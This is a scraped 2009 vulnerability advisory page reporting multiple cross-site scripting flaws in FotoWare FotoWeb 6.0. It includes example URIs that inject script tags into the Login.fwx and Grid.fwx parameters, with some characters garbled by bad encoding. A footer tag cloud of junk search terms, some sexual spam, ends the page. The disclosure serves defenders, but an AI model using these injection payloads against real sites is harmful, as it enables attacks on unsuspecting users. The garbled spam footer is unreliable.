about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , FotoWeb Multiple Cross Site Scripting Vulnerabilities


Title FotoWeb Multiple Cross Site Scripting Vulnerabilities
Published 2009-02-09-12:00AM
Updated 2009-02-11-06:38PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Stelios Tigkas
Vulnerable  FotoWare FotoWeb 6.0
Not Vulnerable  
Code  An attacker can exploit these issues by enticing an unsuspecting victim to follow a malicious URI.The following example URIs are available:http://www.example.com/fotoweb/cmdrequest/Login.fwx?s="><script>alert(â??0wn3dâ?)</script>
http://www.example.com/fotoweb/Grid.fwx?&search=<script>alert("0wn3d�)</script> and (FQYFT
contains(JPEG))
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 03:19:56 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.iso08. sandboxing SEX 3GP Record snitz 3.4. www.wym86. www.xex.co 0009.com news for c My_eGaller herde+3.2 php-nuke 2 free sexs Dropbear s news for c Tsunadesex www.fuckgi 3d sex gam news for c sex viduo kernel 2.6 Pepek News Searc www.xianch Uangom www.lv87.c Tyo3 joomla! is news for c www.xianch mambo Remo j4819a www.segou1 www.xianch www.qdky12 WebJeff CMS is Fre WWW.U.S.A www.gjszy. www.xianch hkjhg irix remot www.xianch addguest.h news for C Crack Data northsex www.segou1 3D toon se www.xianch